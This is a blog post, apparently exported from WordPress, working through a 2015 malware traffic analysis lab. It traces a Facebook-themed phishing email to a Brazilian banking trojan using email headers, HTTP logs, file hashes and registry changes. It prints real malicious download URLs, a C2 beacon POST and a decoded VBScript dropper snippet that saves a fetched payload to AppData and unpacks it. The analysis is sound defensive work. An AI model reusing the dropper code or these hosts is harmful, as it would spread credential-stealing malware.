{"id":124,"date":"2015-08-18T13:54:33","date_gmt":"2015-08-18T12:54:33","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=124"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-08-07-someone-was-fooled-by-a-malicious-email","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=124","title":{"rendered":"Malware Exercise 2015-08-07 &#8211; Someone was fooled by a malicious email"},"content":{"rendered":"<h3>Prologue about this and future &#8220;Malware Excercise&#8221; posts<\/h3>\n<p>I have been wanting to blog about my experiences playing with malware and trying to figure out how they work, techniques that helped me dissect them, tools that I used, etc&#8230; but never really had the chance\/time to sit down and do it outside of work. Since Security Researcher Brad Duncan (follow him on <a href=\"http:\/\/twitter.com\/malware_traffic\" target=\"_blank\">Twitter<\/a><span class=\"u-linkComplex-target\"> or via his site at <a href=\"http:\/\/malware-traffic-analysis.net\" target=\"_blank\">Malware Traffic Analysis<\/a>) has started to do lab exercises for other researchers\/analysts I figured that it would be a good way of killing two birds with one stone (doing the exercise and writing about it). So with that being said, I will take what I have gathered from the lab exercises and use that as my blog posts to document how I found things, tools used, etc&#8230; For more information about the exercises that Brad has on his site, you can click <a href=\"http:\/\/www.malware-traffic-analysis.net\/training-exercises.html\" target=\"_blank\">here<\/a>. <\/span><\/p>\n<h3>Stupid emails!<\/h3>\n<p>TL;DR &#8211; In this exercise a user got an email and proceeded to get compromised from it. The end-goal is to figure out which email, and develop a time-line of events from the artifacts found.<\/p>\n<h3>My Results<\/h3>\n<ul>\n<li>The infected computer&#8217;s host name.<br \/>\n<blockquote><p>\n  Pertruide-PC\n<\/p><\/blockquote>\n<\/li>\n<li>The infected computer&#8217;s MAC address.<br \/>\n<blockquote><p>\n  00:1e:4f:6c:ba:05\n<\/p><\/blockquote>\n<\/li>\n<li>The infected computer&#8217;s operating system.<br \/>\n<blockquote><p>\n  Windows 7 running IE v11.0\n<\/p><\/blockquote>\n<\/li>\n<li>The date, time, subject line, and sender of the malicious email that caused the infection.<br \/>\n<blockquote><p>\n  To: degrando.rustlyn@world-of-widgets.com<br \/>\n  Subject: Voce recebeu comentario de voz em sua foto &#8211; 3192132<br \/>\n  From: &#8220;Facebook.com&#8221; &lt;accounts@passport.com&gt;<br \/>\n  Date: Tue, 4 Aug 2015 20:16:47 +0000 (UTC)\n<\/p><\/blockquote>\n<\/li>\n<li>Information on any malware associated with the infection.<br \/>\n<blockquote><p>\n  Based on what the alert is for, this looks to be a banking credential theft type of malware that goes after credentials of banks. It looks at any open tabs in a browser to see if there is an open bank page. If none is found, then it looks in the browser history to see if anything is there. It has also been noted to dropping a keylogger on the system to obtain credentials, or setting up a fake bank site to obtain credentials.\n<\/p><\/blockquote>\n<\/li>\n<li>Domains and IP addresses of any related traffic.<br \/>\n<blockquote><p>\n  http:\/\/www.ica.ufmg.br\/rha\/images\/pdf.php \/ 150.164.130.253<br \/>\n  http:\/\/downloadpdf.demojoomla.com\/Download.rar \/ 67.212.169.218<br \/>\n  http:\/\/downloadpdf.demojoomla.com\/Gravar.zip \/ 67.212.169.218<br \/>\n  http:\/\/australiano2015.com.br \/ 69.49.115.40\n<\/p><\/blockquote>\n<\/li>\n<li>A timeline of events leading to the infection.<br \/>\n> Tue, 4 Aug 2015 20:16:47 +0000 (UTC) &#8211; Email is delivered to Degrando<br \/>\n> Wednesday 2015-08-05 SOC is alerted via Sguil<br \/>\n> (Approx) Wed, 05 Aug 2015 17:04 UTC+1 &#8211; Link to the initial malicious site is clicked (http:\/\/www.ica.ufmg.br\/rha\/images\/pdf.php)<br \/>\n> Wed, 05 Aug 2015 17:01 UTC+1 &#8211; Redirect from the initial malicious site (http:\/\/downloadpdf.demojoomla.com\/Download.rar)<br \/>\n> Wed, 05 Aug 2015 17:03 UTC+1 &#8211; Redirect from the initial malicious site (http:\/\/downloadpdf.demojoomla.com\/Gravar.rar)<br \/>\n> Wed, 05 Aug 2015 16:04 UTC+1 &#8211; Callback traffic to australiano2015.com.br<br \/>\n<!--more--><\/li>\n<\/ul>\n<h3>Notes about this investigation:<\/h3>\n<p>Email #2 was the email message that lead to the compromise. Take notice of the bold red parts of the email below:<\/p>\n<blockquote><p><span style=\"color: #ff0000;\"><strong>Received:\u00a0 from shopd.animatursyes.com (shopd.animatursyes.com [50.23.53.30]) by [redacted]; Tue, 4 Aug 2015 20:31:13 +0000 (UTC)<\/strong><\/span><br \/>\n<span style=\"color: #ff0000;\"><strong>Received:\u00a0 by shopd.animatursyes.com (Postfix, from userid 33) id 552C8198179; Tue, 4 Aug 2015 20:16:47 +0000 (UTC)<\/strong><\/span><br \/>\nTo:\u00a0 degrando.rustlyn@world-of-widgets.com<br \/>\nSubject:\u00a0 Voce recebeu comentario de voz em sua foto &#8211; 3192132<br \/>\n<span style=\"color: #ff0000;\"><strong>From:\u00a0 &#8220;Facebook.com&#8221; &lt;accounts@passport.com&gt;<\/strong><\/span><br \/>\nMIME-Version:\u00a0 1.0<br \/>\nContent-Type:\u00a0 multipart\/mixed; boundary=&#8221;13a82c8fbf1e42223cf0a61842c24be9&#8243;<br \/>\nMessage-Id:\u00a0 &lt;20150804201844.552C8198179@shopd.animatursyes.com&gt;<br \/>\nDate:\u00a0 Tue, 4 Aug 2015 20:16:47 +0000 (UTC)<\/p>\n<p>Content-Transfer-Encoding: 7bit<br \/>\nThis is a MIME encoded message.<\/p>\n<p>&#8211;13a82c8fbf1e42223cf0a61842c24be9<br \/>\nContent-Type: text\/html; charset=&#8221;iso-8859-1&#8243;<br \/>\nContent-Transfer-Encoding: quoted-printable<\/p>\n<p>&lt;!DOCTYPE HTML PUBLIC &#8220;-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN&#8221;&gt;<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;div class=3D&#8221;separator&#8221; style=3D&#8221;clear: both; text-align: center;&#8221;&gt;&lt;a<br \/>\nhref=3D&#8221;hxxp:\/\/www[.]ica[.]ufmg[.]br\/rha\/images\/pdf.php&#8221;&gt;&lt;img<br \/>\nsrc=3D&#8221;http:\/\/1.bp[.]blogspot[.]com\/-QsxSVcQGp-w\/VBnWc4vWVmI\/AAAAAAAAAC8\/YSm=XV-22scs\/s1600\/dd.png&#8221; border=3D&#8221;0&#8243;&gt;&lt;\/a&gt;&lt;\/div&gt;<br \/>\n&lt;div class=3D&#8221;separator&#8221; style=3D&#8221;clear: both; text-align: center;&#8221;&gt;<br \/>\n&lt;br&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;br&gt;<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<br \/>\n&lt;br&gt;&lt;a scr=3D&#8221;id:0,254670381546021&#8243;&gt;<\/p>\n<p>&#8211;13a82c8fbf1e42223cf0a61842c24be9<br \/>\nContent-Type: application\/octet-stream; name=&#8221;&#8221;<br \/>\nContent-Transfer-Encoding: base64<br \/>\nContent-Disposition: attachment<\/p>\n<p>&#8211;13a82c8fbf1e42223cf0a61842c24be9&#8211;<\/p><\/blockquote>\n<p>Now the link in the email mentioned above does a 302 redirect as seen below from the PCAP:<\/p>\n<blockquote><p>GET \/rha\/images\/pdf.php HTTP\/1.1<br \/>\nAccept: text\/html, application\/xhtml+xml, *\/*<br \/>\nAccept-Language: en-US<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nHost: www.ica.ufmg.br<br \/>\nConnection: Keep-Alive<\/p>\n<p>HTTP\/1.1 302 Found<br \/>\nDate: Wed, 05 Aug 2015 16:04:22 GMT<br \/>\nServer: Apache<br \/>\nLocation: http:\/\/downloadpdf.demojoomla.com\/Download.rar<br \/>\nSet-Cookie: PHPSESSID=gum7l49126aqapc5file71o6l6; path=\/<br \/>\nExpires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br \/>\nPragma: no-cache<br \/>\nSet-Cookie: NotCont=191.96.248.167; expires=Wed, 05-Aug-2015 17:04:22 GMT<br \/>\nContent-Length: 0<br \/>\nConnection: close<br \/>\nContent-Type: text\/html; charset=UTF-8<\/p><\/blockquote>\n<p>Based on the HTTPS logs that was supplied for this exercise, we can see that there are two files that are downloaded as witnessed below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/HTTPS-Logs.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-127\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/HTTPS-Logs.png\" alt=\"HTTPS Logs\" width=\"1600\" height=\"108\" \/><\/a><\/p>\n<blockquote><p>File #1 &#8211; Aug 5, 2015 17:01: http:\/\/downloadpdf.demojoomla.com\/Download.rar<br \/>\nMD5 = 6325f04a77fce24c8c43b71d817d3fe7<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/1c9b68f1ee6b842a3c7b01a7b41e74e6f22b1ee6925e6cfb067401ac573813be\/analysis\/1439293884\/<br \/>\nVT hits: 20 \/ 57<br \/>\nFirst Scan Date: 2015-08-11 11:51:24<\/p>\n<p style=\"padding-left: 30px;\">This Rar file contains the folder and file: Download\\Download.vbe<br \/>\nMD5 = 50ac6b67b095aeb4e85b3f94e66d8666<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/26b4816ccc24624dc505d8711641630793d96da497bed827efd6392da276eecf\/analysis\/1438890108\/<br \/>\nVT hits: 16 \/ 55<br \/>\nFirst Scan Date: 2015-08-06 19:41:48<\/p>\n<p>File #2 &#8211; Aug 5, 2015 17:03: http:\/\/downloadpdf.demojoomla.com\/Gravar.rar<br \/>\nMD5 = e1d6e85f72d76845f9dc1c5c3d4fd469<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/8b4afdcd97e2c42bb841f48b90bededbf64632dede258afcb5675d878c0e8fdc\/analysis\/1439071536\/<br \/>\nVT hits: 14 \/ 56<br \/>\nFirst Scan Date: 2015-08-08 22:05:36<\/p>\n<p style=\"padding-left: 30px;\">This zip file contains the file: dmw.exe<br \/>\nMD5 = 3c3e8b9b18fb1d14095adb0a16d457d8<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/033742c2c7d5393300366b61ffd946d8ffe2a664f4cf8ed6b00ad28cafc66fb9\/analysis\/1439285641<br \/>\nVT hits: 16 \/ 56<br \/>\nFirst Scan Date: 2015-08-11 09:34:01<\/p>\n<\/blockquote>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Details-of-DMW.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-128\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Details-of-DMW.png\" alt=\"Details of DMW\" width=\"407\" height=\"323\" \/><\/a> <a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Digital-Signature-of-DMW.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-129\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Digital-Signature-of-DMW.png\" alt=\"Digital Signature of DMW\" width=\"413\" height=\"267\" \/><\/a><\/p>\n<p><strong>**Note:<\/strong> The one thing that I would like to point out here is that the VBE file found in the &#8216;Download.rar&#8217; file was decrypted via the script found <a href=\"http:\/\/www.interclasse.com\/scripts\/decovbe.php\" target=\"_blank\">here<\/a>.<\/p>\n<p>When using the script above, I used csript over wscript so I could pipe the output to a text file and try to decipher it from there. The <a href=\"http:\/\/github.com\/bloomer1016\/Malware-Excercises\/blob\/master\/2015-08-07%20Traffic%20Analysis%20Exercise\/Artifacts\/Download.Rar_Download.vbe_decoded.log\" target=\"_blank\">decrypted file<\/a> can be found over on my GitHub page (where all my findings are located from the different exercises). Based on what I am seeing in the decoded &#8216;Download.Rar_Download.vbe_decoded.log&#8217; it looks like the script checks to see if there is a file called &#8216;monumento.zip&#8217; and if so deletes it. It then downloads the Gravar.rar file.<\/p>\n<p>The part that I am not sure of is how it extracts itself and runs considering that I am not seeing anything in the script that performs these tasks like it does for the &#8216;monumento.zip&#8217; file as you can see from the snippet below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">If universal.Status = 200 Then\r\n  Dim cafezinho\r\n  Set cafezinho = CreateObject(Base64Decode(&quot;QURPREIuU3RyZWFt&quot;)) --&amp;gt; Set cafezinho = CreateObject(Base64Decode(&quot;ADODB.Stream&quot;))\r\n  With cafezinho --&amp;gt; CreateObject(Base64Decode(&quot;ADODB.Stream&quot;))\r\n    .Type = 1 'adTypeBinary\r\n    .Open\r\n    .Write universal.responseBody\r\n    .SaveToFile responde --&amp;gt; .SaveToFile &quot;C:\\Users\\&quot; &amp;amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp;amp; &quot;\\AppData\\Roaming&quot; &amp;amp; &quot;\\monumento.zip&quot;\r\n    .Close\r\n  End With\r\n  set cafezinho = Nothing --&amp;gt; set CreateObject(Base64Decode(&quot;ADODB.Stream&quot;)) = Nothing\r\nEnd If\r\n\r\nSet objt = CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\nIf objt.FileExists(responde) Then --&amp;gt; If objt.FileExists(&quot;C:\\Users\\&quot; &amp;amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp;amp; &quot;\\AppData\\Roaming&quot; &amp;amp; &quot;\\monumento.zip&quot;) THEN\r\nset sa = CreateObject(&quot;Shell.Application&quot;) \r\nset filesInzip=sa.NameSpace(responde).items --&amp;gt; set filesInzip=sa.NameSpace(&quot;C:\\Users\\&quot; &amp;amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp;amp; &quot;\\AppData\\Roaming&quot; &amp;amp; &quot;\\monumento.zip&quot;).items\r\nsa.NameSpace(BAILARINA).CopyHere(filesInzip) --&amp;gt; sa.NameSpace(&quot;C:\\Users\\&quot; &amp;amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp;amp; &quot;\\AppData\\Roaming&quot;).CopyHere(filesInzip)\r\nEnd if<\/pre>\n<p>Regardless I know that the dwm.exe file gets executed (somehow) and runs for a while. It then spawns a new process and calls vbc.exe which then starts to connect to the site australiano2015.com.br\/accord\/point.php and performs a POST to that site with information about the type of system and what is running on it as seen below:<\/p>\n<blockquote><p>POST \/accord\/point.php HTTP\/1.0<br \/>\nConnection: keep-alive<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 138<br \/>\nHost: australiano2015.com.br<br \/>\nAccept: text\/html, *\/*<br \/>\nAccept-Encoding: identity<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/39.0.2171.71 Safari\/537.36<\/p>\n<p>ID_MAQUINA=PERTRUIDE-PC&amp;VERSAO=3.7&amp;WIN=Microsoft+Windows+7+Home+Premium++6.1.7601&amp;NAVEGADOR=&amp;PLUGIN=Sem+Plugin&amp;AV=Sem+Anti-Virus+InstaladoHTTP\/1.1 200 OK<br \/>\nDate: Wed, 05 Aug 2015 16:04:39 GMT<br \/>\nContent-Length: 9<br \/>\nKeep-Alive: timeout=10, max=100<br \/>\nConnection: Keep-Alive<br \/>\nContent-Type: text\/html<br \/>\nSet-Cookie: TS0194eee0=013c871b06d32a5a34d3738a33af95bd8dbaade713d043ffbed029a8cb7a8f1762517dfc2f; Path=\/<\/p>\n<p>TRUEFalse<\/p><\/blockquote>\n<h3>The following is what I saw from my test run of the DMW.exe file on my Windows VM after running for a while:<\/h3>\n<ul>\n<li>Current Directory: C:\\Users\\Administrator\\Desktop\\Excercise\\Gravar\\<\/li>\n<li>Command Line: &#8220;C:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe&#8221;<\/li>\n<\/ul>\n<h3>File changes to the system using <a href=\"http:\/\/sourceforge.net\/projects\/regshot\/\" target=\"_blank\">RegShot<\/a> after running the dmw.exe file:<\/h3>\n<ul>\n<li>C:\\Users\\Administrator\\AppData\\Local\\Temp\\serpente.txt<\/li>\n<li>C:\\Users\\Administrator\\AppData\\Roaming\\botpc.cdr<\/li>\n<li>C:\\Users\\Administrator\\AppData\\sqlite3.dll<\/li>\n<\/ul>\n<h3>Reg Keys added to the system using <a href=\"http:\/\/sourceforge.net\/projects\/regshot\/\" target=\"_blank\">RegShot<\/a> after running the dmw.exe file:<\/h3>\n<ul>\n<li>HKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist&#123;CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qrfxgbc\\Rkprepvfr\\Tenine\\qzj.rkr: 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF FF FF FF FF 80 C7 4C 33 AE D5 D0 01 00 00 00 00<\/li>\n<li>HKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MediaCenter: &#8220;C:\\Users\\Administrator\\AppData\\Roaming\\dmw.exe&#8221;<\/li>\n<\/ul>\n<p>Notice how the above regkey is added for persistence in a non-usual place (at least I have not seen this location before this exercise).<\/p>\n<h3>&#8211; Update 8.19.2015<\/h3>\n<p>So after talking to a couple of other analysts at work that did the exercise about how the dmw.exe file gets unzipped, and executed, one of them brought up this particular line of code from the script:<\/p>\n<p><code>.SaveToFile responde --&gt; .SaveToFile \"C:\\Users\\\" &amp; wScript.createObject(\"WScript.Shell\").expandEnvironmentStrings(\"%USERNAME%\") &amp; \"\\AppData\\Roaming\" &amp; \"\\monumento.zip\"<\/code><\/p>\n<p>which tells the script to save the file (the gravar.zip file) <strong>AS<\/strong> &#8220;monumento.zip&#8221; on the filesystem. Later on in the code, the file gets unzipped as well and executed. Now that makes sense! Mystery solved.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prologue about this and future &#8220;Malware Excercise&#8221; posts I have been wanting to blog about my experiences playing with malware and trying to figure out how they work, techniques that helped me dissect them, tools that I used, etc&#8230; but never really had the chance\/time to sit down and do it outside of work. Since Security Researcher Brad Duncan (follow him on Twitter or via his site at Malware Traffic Analysis) has started to do lab exercises for other researchers\/analysts I figured that it would be a good way of killing two birds with one stone (doing the exercise and&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=124\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-124","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/124","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=124"}],"version-history":[{"count":18,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/124\/revisions"}],"predecessor-version":[{"id":171,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/124\/revisions\/171"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}